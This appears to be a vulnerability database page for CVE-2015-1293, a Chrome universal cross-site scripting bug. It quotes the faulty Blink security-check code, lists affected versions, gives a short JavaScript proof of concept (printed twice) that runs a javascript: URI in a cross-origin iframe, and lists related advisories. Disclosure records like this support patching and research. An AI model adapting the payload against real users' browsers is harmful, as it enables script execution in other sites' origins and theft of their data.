Lucene search
RootSSV:93033HistoryApr 24, 2017 - 12:00 a.m.
Chrome Universal XSS by loading a javascript: URI from an unloaded window (CVE-2015-1293)
2017-04-2400:00:00
Root
www.seebug.org
19
0.011 Low
EPSS
Percentile
83.0%
VULNERABILITY DETAILS
From /WebKit/Source/core/frame/DOMWindow.cpp:
bool DOMWindow::isInsecureScriptAccess(LocalDOMWindow& callingWindow, const String& urlString)
{
if (!protocolIsJavaScript(urlString))
return false;
// If this DOMWindow isn't currently active in the Frame, then there's no
// way we should allow the access.
if (isCurrentlyDisplayedInFrame()) {
// FIXME: Is there some way to eliminate the need for a separate "callingWindow == this" check?
if (&callingWindow == this)
return false;
// FIXME: The name canAccess seems to be a roundabout way to ask "can execute script".
// Can we name the SecurityOrigin function better to make this more clear?
if (callingWindow.frame()->securityContext()->securityOrigin()->canAccessCheckSuborigins(frame()->securityContext()->securityOrigin()))
return false;
}
callingWindow.printErrorMessage(crossDomainAccessErrorMessage(&callingWindow));
return true;
}
|callingWindow| may be an unloaded window whose associated |frame()| holds another, potentially cross-origin document. As a result, the security check can be bypassed.
VERSION
Chrome 44.0.2403.157 (Stable)
Chrome 45.0.2454.46 (Beta)
Chrome 46.0.2486.0 (Dev)
Chromium 47.0.2493.0 (Release build compiled today)
REPRODUCTION CASE
<script>
var i = document.documentElement.appendChild(document.createElement('iframe'));
var f = frames[0].Function;
i.onload = function() {
f("location.replace('javascript:alert(location)')")();
}
i.src = 'https://abc.xyz';
</script>
<script>
var i = document.documentElement.appendChild(document.createElement('iframe'));
var f = frames[0].Function;
i.onload = function() {
f("location.replace('javascript:alert(location)')")();
}
i.src = 'https://abc.xyz';
</script>
Related
prion
prion
Design/Logic Flaw
2015-09-03 22:59:00
ubuntucve
ubuntucve
CVE-2015-1293
2015-09-02 00:00:00
cve
cve
CVE-2015-1293
2015-09-03 22:59:00
debiancve
debiancve
CVE-2015-1293
2015-09-03 22:59:00
nessus
nessus
Ubuntu 14.04 LTS : Oxide vulnerabilities (USN-2735-1)
2015-09-09 00:00:00
FreeBSD : chromium -- multiple vulnerabilities (a9350df8-5157-11e5-b5c1-e8e0b747a45a)
2015-09-03 00:00:00
Google Chrome < 45.0.2454.85 Multiple Vulnerabilities
2015-09-02 00:00:00
securityvulns
securityvulns
[USN-2735-1] Oxide vulnerabilities
2015-09-14 00:00:00
Google Chrome / Oxide multiple security vulnerabilities
2015-09-14 00:00:00
ubuntu
ubuntu
Oxide vulnerabilities
2015-09-08 00:00:00
openvas
openvas
Ubuntu: Security Advisory (USN-2735-1)
2015-09-09 00:00:00
Mageia: Security Advisory (MGASA-2015-0356)
2015-10-15 00:00:00
Debian: Security Advisory (DSA-3351-1)
2015-09-02 00:00:00
threatpost
threatpost
Google Chrome 45 Security Patches, Bug Bounty Awards
2015-09-02 08:48:53
osv
osv
chromium-browser - security update
2015-09-03 00:00:00
freebsd
freebsd
chromium -- multiple vulnerabilities
2015-09-01 00:00:00
archlinux
archlinux
chromium: multiple issues
2015-09-02 00:00:00
debian
debian
[SECURITY] [DSA 3351-1] chromium-browser security update
2015-09-03 22:10:19
[SECURITY] [DSA 3351-1] chromium-browser security update
2015-09-03 22:10:19
chrome
chrome
Stable Channel Update
2015-09-01 00:00:00
redhat
redhat
(RHSA-2015:1712) Important: chromium-browser security update
2015-09-03 00:00:00
mageia
mageia
Updated chromium-browser packages fix security vulnerabilities
2015-09-08 20:55:59
kaspersky
kaspersky
KLA10655 Multiple vulnerabilities in Google Chrome
2015-09-01 00:00:00
gentoo
gentoo
Chromium: Multiple vulnerabilities
2016-03-12 00:00:00